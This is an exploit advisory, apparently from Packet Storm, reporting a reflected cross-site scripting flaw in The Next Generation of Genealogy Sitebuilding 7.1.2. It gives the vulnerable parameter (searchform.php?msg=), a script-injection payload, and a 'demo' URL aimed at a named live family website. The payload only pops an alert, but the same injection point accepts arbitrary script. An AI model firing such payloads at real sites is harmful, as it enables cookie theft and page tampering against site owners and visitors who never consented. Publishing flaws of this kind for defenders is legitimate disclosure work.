The Next Generation of Genealogy Sitebuilding version 7.1.2 suffers from a cross site scripting vulnerability.
ceea14507d556caa6af031be03e20b6049d62d9bf686e4089b8b3f6754b3662f
______ __ ______
/\ == \ /\ \ /\ __ \
\ \ __< \ \ \ \ \ \/\ \
\ \_____\ \ \_\ \ \_____\
\/_____/ \/_/ \/_____/
[#]----------------------------------------------------------------[#]
#
# [x] Target: The Next Generation of Genealogy Sitebuilding [XSS]
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Download: http://lythgoes.net/genealogy/software.php
# [x] Version: 7.1.2
# [x] Price: $29.99 USD
# [x] Thanks: packetdeath
#
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# http://localhost/searchform.php?msg=[XSS]
#
# [x] Poc :
#
# http://localhost/searchform.php?msg=searchform.php?msg="/><script>alert('XSS')</script>
#
[#]------------------------------------------------------------------------------------------[#]
#
# Demo :
#
# [+] http://horwitzfam.org/searchform.php?msg="/><script>alert('XSS')</script>
#
#
[#]-------------------------------------------------------------------------------------------[#]
#EOF
_________________________________________________________________
Windows Live: Friends get your Flickr, Yelp, and Digg updates when they e-mail you.
http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_3:092010
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed